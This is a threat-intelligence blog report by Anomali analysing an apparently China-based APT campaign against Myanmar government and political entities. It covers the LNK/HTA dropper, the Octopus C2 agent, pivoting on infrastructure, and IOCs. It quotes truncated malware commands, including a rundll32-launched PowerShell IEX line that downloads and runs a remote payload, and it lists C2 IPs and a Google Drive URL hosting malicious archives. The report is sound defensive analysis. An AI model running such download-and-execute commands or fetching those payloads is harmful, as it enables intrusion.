Unknown China-Based APT Targeting Myanmarese Entities
By Anomali Threat Research
Archived: 2026-04-02 11:52:51 UTC
The malicious activity identified by Anomali Threat Research appears to align with techniques that would be used
by a China-based group. Following the Belt and Road Initiative can often result in identifying malicious activity
that coincides with China-based groups’ Tactics, Techniques, and Procedures (TTPs).
OverviewTargetingTechnical AnalysisConclusionIOCsEndnotes
https://www.anomali.com/blog/unknown-china-based-apt-targeting-myanmarese-entities#When:14:00:00Z
Page 1 of 9

Authored by: Parthiban Rajendran and Gage Mele
Information cutoff date: 6/19/2020
Overview
Anomali Threat Research has identified malicious activity targeting entities based in Myanmar (Burma) that
appears to have begun in March 2020; this is based on file names and payload compilation times. An unidentified
Advanced Persistent Threat (APT), very likely China-based, is distributing Windows Shortcut (LNK) files that are
being renamed and distributed to multiple targets, likely via spearphishing. Anomali Threat Research found these
LNK files located inside multiple, uniquely-named RAR, TGZ, and ZIP files. The RAR and ZIP files are hosted
https://www.anomali.com/blog/unknown-china-based-apt-targeting-myanmarese-entities#When:14:00:00Z
Page 2 of 9

on Google Drive, this is very likely a tactic to avoid antivirus detection. The group uses the PowerShell-based,
Red Teaming tool Octopus for Command and Control (C2) communication.
In addition, Anomali Threat Research found that the LNK file closely resembles the one used by the China-based
APT, Mustang Panda. Anomali Threat Research does not believe that this group is responsible for this activity.
This similarity may potentially indicate a sharing of tools, which is common amongst some state-sponsored
groups, or perhaps a similar tool that is used to target specific geographic regions. At the time of this writing,
Anomali Threat Research cannot attribute this APT activity to any specific group. The renamed LNK files are
shown in Table 1 below.
Targeting
China-sponsored APT groups are known to target countries in which the government of the People’s Republic of
China is investing in, as part of its Belt and Road Initiative. This has also been observed by Anomali Threat
Research analysis of the China-based APT, Mustang Panda. China and Myanmar (Burma) have had multiple
instances of economic activity and agreements in 2020, as of this writing, and the two countries share a complex
history that often resulted in conflict.[1] In January 2020, President Xi Jinping visited Myanmar and State
Counselor Aung San Suu signed 33 agreements concerning projects as part of the Belt and Road Initiative.[2]
China is also one of the largest investors in Myanmar, accounting for a quarter of all Myanmar’s investment, and
is Myanmar’s largest export partner.
[3]
 Anomali Threat Research believes that because of these economic factors,
in addition, to file names and compilation times, similar malicious functionality to previously-attributed China-based groups and geographic location of potential targets, that this activity very likely originates from a China-based source.
Potentially-Targeted Entities
These possible targets are based specifically on file names identified by Anomali Threat Research.
Myanmar Police Force (MPF)
National Crisis Management Center (NCMC)
National League for Democracy (NLD)
Office of Chief of Military Security Affairs (OCMSA)
The economic activity between China and Myanmar that is of particular interest to Anomali Threat Research is the
Myanmar Yatai International Holding Group’s, a subsidiary of China’s Yatai Group, investment into the
development of 25.5 acres in Kayin State, Myanmar.
[4]
 There are dubious details concerning the urban
development in the acreage near the Thailand border, which was approved by the Myanmar Investment
Commission, and discussed by a director of Myanmar’s Directorate of Investment Company Administration
(DICA); who confirmed the land was for 59 villas in three years.[5] In early-March 2020, the Myanmar Yatai
International Holding Group claimed that the first phase of development covered 214 acres, instead of the 25.5
acres approved by the government in an area controlled by Kayin State.[6] The claim in March 2020 may be a
potential catalyst, or purposefully alignment, for this campaign.
Table 1 - Renamed LNKs Located inside RAR or ZIP
https://www.anomali.com/blog/unknown-china-based-apt-targeting-myanmarese-entities#When:14:00:00Z
Page 3 of 9

File Name MD5
ocmsa[2020]report.rar 916b26f22658ce252531bb4ea43ef4cf
Htoo 2 army research (Mpf 29-03-2020).zip 75b72340d6988ac262cabf923e548952
ocmsa Htoo 2 army research (Mpf 29-03-2020).rar 1f89a9d077a9712e6d227ef3cb1faac9
ocmsa[30-03-2020].zip 9e1f7e35fb3ae292f478d346d076c274
Technical Analysis
Threat actors very likely distributing spearphishing emails with links to download an attachment from Google
Drive. Utilizing Google Drive is a known tactic used by actors to evade antivirus and security scanners from
identifying the malicious files. Once a user navigates to the Drive URL that a ZIP or RAR file that contains a
weaponized Windows Shortcut file will be downloaded on the target host. The LNK file utilized in the campaign
contains an embedded HTA file with VBscript that, once executed, will drop and run an executable in the
background and communicates with the Command and Control (C2).
LNK File Analysis
Once the user opens the LNK file, the below command gets executed. The command looks for a file that contains
*2020*.LNK and proceeds to execute via mshta.exe.
Command
 /c for %x in (%temp%=%cd%) do for /f "delims==" %i in ('dir /s /b "%x *2020*.LNK"') do start %TEMP:~
After the command execution, it writes an executable named f.exe in the “C:userspublic.exe” directory. The file
f.exe is then executed using Windows Management Instrumentation (WMI) in a hidden window via WMI Tasks.
Screenshot of the LNK file
Figure 2 - Screenshot of the LNK file
It is worth noting that the LNK file with an embedded HTA file is very similar to Mustang Panda’s initial dropper,
however, Anomali Threat Research could not attribute this activity to the group.
The executable f.exe uses the Living off the Land (LOLbin) technique to launch cmd.exe via the
ShellExec_RunDLL function. The below command uses Powershell to download and execute the second stage
payload from the C2 server.
 "C:WindowsSystem32 undll32.exe" SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c powershell IEX (New-Objec
The downloaded file index is a PowerShell script that was found to be a publicly available Octopus C2
framework agent as shown in Figure 3.[7]
https://www.anomali.com/blog/unknown-china-based-apt-targeting-myanmarese-entities#When:14:00:00Z
Page 4 of 9

Octopus C2 agent
Figure 3 - Octopus C2 agent comparison
The Octopus agent fingerprints the host and sends the collected information back to C2 as part of the encrypted
HTTP header as shown in Figure 4. The Octopus agent can be used to download further payloads or perform
additional activity onto the infected host.
Octopus agent code
Figure 4 - Snippet of the Octopus agent code
Network Pivoting for Additional Samples
193.29.59[.]130
Using the IP address 193.29.59[.]130 as a pivot point Anomali Threat Research was able to find a new sample
named D0CX_OCMSA Russia Army Weppon Ferrence to Thailand Archive.exe from Hybrid-analysis.com as
shown in Figure 5.
Newly Identified Sample
Figure 5 - Screenshot of Newly Identified Sample
The sample communicates to two C2 IP addresses as shown in Figure 6.
23.106.122.234
193.29.59.130
Newly Observed C2 IP Address
Figure 6 - Newly Observed C2 IP Address
23.106.122.234
Upon pivoting using the IP address 23.106.122.234, Anomali Threat Research was able to identify the
PowerShell-based Octopus agent from the C2 server as shown in Figure 7 below.
Newly Identified Samples Communicating to 23.106.122.234
Figure 7 - Newly Identified Samples Communicating to 23.106.122.234
Pivoting via Compilation Timestamp
In order to find more samples from the campaign, Anomali Threat Research used the compilation timestamp from
one of the identified samples 6a1611c1bd34fa3878617ef2905b1d87 which was compiled on
2020-03-10 07:54:26 and shown in Table 2 below.
Table 2 -
https://www.anomali.com/blog/unknown-china-based-apt-targeting-myanmarese-entities#When:14:00:00Z
Page 5 of 9

File Name MD5
Compilation
Timestamp
No file name observed 4cf56653f28ccd03a78213f0b4cb0075
2020-03-10
07:54:26
List Of Maf President Commander in Chief
with NLD Election.Exe
fd82b2a1b6479de8e1949c72401c1328
2020-03-10
07:54:26
order545.exe a086fae1cd2a1074ee489535169f1b79
2020-03-10
07:54:26
Conclusion
The malicious activity identified by Anomali Threat Research appears to align with techniques that would be used
by a China-based group. Following the Belt and Road Initiative can often result in identifying malicious activity
that coincides with China-based groups’ Tactics, Techniques, and Procedures (TTPs). The specificity in file names
associated with Myanmarese entities, similar LNK functionality to known China-sponsored APTs, as well as
economic and geographical factors, lead Anomali Threat Research to believe that China-based APT is responsible
for this campaign.
IOCs
File Name Hash
ocmsa[2020]report.rar 916b26f22658ce252531bb4ea43ef4cf
ocmsa[30-03-2020].zip 9e1f7e35fb3ae292f478d346d076c274
ocmsa Htoo 2 army research
(Mpf 29-03-2020).rar
1f89a9d077a9712e6d227ef3cb1faac9
Htoo 2 army research (Mpf
29-03-2020).zip
75b72340d6988ac262cabf923e548952
MSAU UPR Facts.Tgz c94135f94ced83e1bb4c4ebf16d66b30
ocmsa(30-03-2020).lnk 721a7ddd34d801a883bfc8a1e6349a21
Htoo 2 army research (Mpf
29-03-2020).lnk.lnk
721a7ddd34d801a883bfc8a1e6349a21
f.exe 4754dfaf0a10710c061767acc3adf0e3
order545.exe a086fae1cd2a1074ee489535169f1b79
https://www.anomali.com/blog/unknown-china-based-apt-targeting-myanmarese-entities#When:14:00:00Z
Page 6 of 9

D0CX_OCMSA Russia Army
Weppon Ferrence to Thailand
Archive.exe
f8760362de259d8ce4c31c2e9ce1e1392e5eae8262224a517d3accc0ccb9f8d8
List Of Maf President
Commander in Chief with
NLD Election.Exe
fd82b2a1b6479de8e1949c72401c1328
Script.php 1a3683b051356a0d4fef2f8a33cd088c
23.106.122.234 C2
193.29.59.130 C2
The RAR and ZIP files are downloaded from google drive.
File Name Download URL
ocmsa[2020]report.rar
https://drive.google.com/u/0/uc?
id=1WWpgJMZce_yeQd2q5i1z1vUu7_d1rulX&export=download
ocmsa Htoo 2 army research
(Mpf 29-03-2020).rar
https://drive.google.com/u/0/uc?
id=1WWpgJMZce_yeQd2q5i1z1vUu7_d1rulX&export=download
Endnotes
[1]
 Thu Thu Aung and Poppy McPherson, “Myanmar, China ink deals to accelerate Belt and Road as Xi courts and
isolated Suu Kyi,” Reuters, accessed June 18, 2020, published January 18, 2020,
https://www.reuters.com/article/us-myanmar-china/myanmar-china-ink-deals-to-accelerate-belt-and-road-as-xi-courts-an-isolated-suu-kyi-idUSKBN1ZH054; Marvin C. Ott, “Myanmar in China’s Embrace,” Foreign Policy
Institute: Asia Program, accessed June 18, 2020, published January 24, 2020,
https://www.fpri.org/article/2020/01/myanmar-in-chinas-embrace/; Laura Zhou, “China sees Myanmar as stepping
stone to Indian Ocean, energy security,” South China Morning Post, accessed June 18, 2020, published January
15, 2020, https://www.scmp.com/news/china/diplomacy/article/3046218/china-sees-myanmar-stepping-stone-indian-ocean-energy-security; Sai Wanna, “Myanmar military accused ethnic Karen armed group of violating
truce,” Myanmar Times, accessed June 18, 2020, published May 21, 2020,
https://www.mmtimes.com/news/myanmar-military-accuses-ethnic-karen-armed-group-violating-truce.html.
[2]
 Thu Thu Aung and Poppy McPherson, “Myanmar, China ink deals to accelerate Belt and Road as Xi courts and
isolated Suu Kyi,” Reuters.
[3]
 Bloomberg, “Myanmar warns sanctions over Rohingya genocide will push it closer to China and dismisses
‘debt trap’ concerns,” South China Morning Post, accessed June 18, 2020, published January 27, 2020,
https://www.scmp.com/news/asia/southeast-asia/article/3047736/myanmar-warns-world-sanctions-over-rohingya-https://www.anomali.com/blog/unknown-china-based-apt-targeting-myanmarese-entities#When:14:00:00Z
Page 7 of 9

genocide-will; Central Intelligence Agency, “EAST ASIA/SOUTHEAST ASIA :: BURMA,” The World Factbook,
accessed June 19, 2020, https://www.cia.gov/library/publications/the-world-factbook/geos/bm.html.
[4]
 Nan Lwin, “Myanmar Govt to Probe Contentious Chinese Development on Thai Border,” The Irrawaddy,
accessed June 18, 2020, published June 16, 2020, https://www.irrawaddy.com/news/burma/myanmar-govt-probe-contentious-chinese-development-thai-border.html.
[5]
 “INSPECTION OF MYANMAR YATAI INTERNATIONAL HOLDING CO., LTD. AND APEX RUBBER
CO., LTD,” Director of Investment and Company Administration, accessed June 18, 2020, published June 26,
2019; Nyien Nyien, “Chinese Developer’s Grand Claims Spark Fresh Concern in Karen State,” The Irrawaddy,
accessed June 18, 2020, published March 6, 2019, https://www.irrawaddy.com/news/burma/chinese-developers-grand-claims-spark-fresh-concern-karen-state.html.
[6]
 Nyien Nyien, “Chinese Developer’s Grand Claims Spark Fresh Concern in Karen State,” The Irrawaddy.
[7]
 Octopus, accessed June 19, 2020, https://github.com/mhaskar/Octopus/blob/master/agents/agent.ps1.oct.
Iran's Cyber War Machine Hits Full Stride: What CISOs Must Do Right Now
https://www.anomali.com/blog/unknown-china-based-apt-targeting-myanmarese-entities#When:14:00:00Z
Page 8 of 9

When Federal Cyber Defenses Shrink, State Governments Stand in the Crossfire
Iran Cyber War, Day 32: FBI Director Breached, Critical Infrastructure Under Siege, and the
Silence That Should Worry You Most
Source: https://www.anomali.com/blog/unknown-china-based-apt-targeting-myanmarese-entities#When:14:00:00Z
https://www.anomali.com/blog/unknown-china-based-apt-targeting-myanmarese-entities#When:14:00:00Z
Page 9 of 9